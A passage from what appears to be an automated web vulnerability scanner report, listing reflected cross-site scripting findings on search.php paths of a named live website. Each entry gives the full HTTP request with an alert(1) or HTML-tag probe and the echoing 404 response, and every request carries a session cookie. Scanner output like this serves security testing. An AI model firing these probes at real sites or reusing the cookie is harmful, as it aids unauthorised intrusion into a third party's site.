This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images85709<script>alert(1)</script>da0a91ac93b/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images85709<script>alert(1)</script>da0a91ac93b/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3134. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a3cd2<script>alert(1)</script>db463e82eee was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/ratinga3cd2<script>alert(1)</script>db463e82eee/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/ratinga3cd2<script>alert(1)</script>db463e82eee/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3135. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a8ff7<script>alert(1)</script>8acc77cbceb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/search.phpa8ff7<script>alert(1)</script>8acc77cbceb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.phpa8ff7<script>alert(1)</script>8acc77cbceb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3136. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 24070<a>09a29bfbb45 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search24070<a>09a29bfbb45&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search24070<a>09a29bfbb45&opt=2 was not found on this server.</p>
...[SNIP]...

2.3137. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 170cc<a>03be73899a0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...170cc<a>03be73899a0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.php?keyword=search...170cc<a>03be73899a0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3138. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0415<script>alert(1)</script>3dc1dce2d85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e0415<script>alert(1)</script>3dc1dce2d85=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e0415<script>alert(1)</script>3dc1dce2d85=1 was not found on this server.</p>
...[SNIP]...

2.3139. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 47659<a>bc6ab7786e3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=247659<a>bc6ab7786e3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=247659<a>bc6ab7786e3 was not found on this server.</p>
...[SNIP]...

2.3140. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b8566<script>alert(1)</script>0e04a47cc7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb8566<script>alert(1)</script>0e04a47cc7b/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb8566<script>alert(1)</script>0e04a47cc7b/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3141. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6d16<script>alert(1)</script>839e4cf7c54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44a6d16<script>alert(1)</script>839e4cf7c54/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44a6d16<script>alert(1)</script>839e4cf7c54/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3142. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cc1c2<script>alert(1)</script>17fead9c84a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themescc1c2<script>alert(1)</script>17fead9c84a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themescc1c2<script>alert(1)</script>17fead9c84a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3143. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 520e6<script>alert(1)</script>ca1eb2f6296 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos520e6<script>alert(1)</script>ca1eb2f6296/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos520e6<script>alert(1)</script>ca1eb2f6296/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3144. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d71e3<script>alert(1)</script>b611dd79883 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/imagesd71e3<script>alert(1)</script>b611dd79883/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/imagesd71e3<script>alert(1)</script>b611dd79883/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3145. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cf97c<script>alert(1)</script>d168229a91e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/search.phpcf97c<script>alert(1)</script>d168229a91e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.phpcf97c<script>alert(1)</script>d168229a91e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3146. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 46edc<a>5b2715b103c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search46edc<a>5b2715b103c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search46edc<a>5b2715b103c&opt=2 was not found on this server.</p>
...[SNIP]...

2.3147. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 10063<a>d1f045554f8 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...10063<a>d1f045554f8&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.php?keyword=search...10063<a>d1f045554f8&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3148. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6bdfd<script>alert(1)</script>a419029783f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6bdfd<script>alert(1)</script>a419029783f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6bdfd<script>alert(1)</script>a419029783f=1 was not found on this server.</p>
...[SNIP]...

2.3149. http://www.resellerbase.com/detail/44/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c3113<a>3a8b98bd2c6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c3113<a>3a8b98bd2c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c3113<a>3a8b98bd2c6 was not found on this server.</p>
...[SNIP]...

2.3150. http://www.resellerbase.com/detail/44/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3e50f<script>alert(1)</script>c24f9ba5ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3e50f<script>alert(1)</script>c24f9ba5ae/44/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
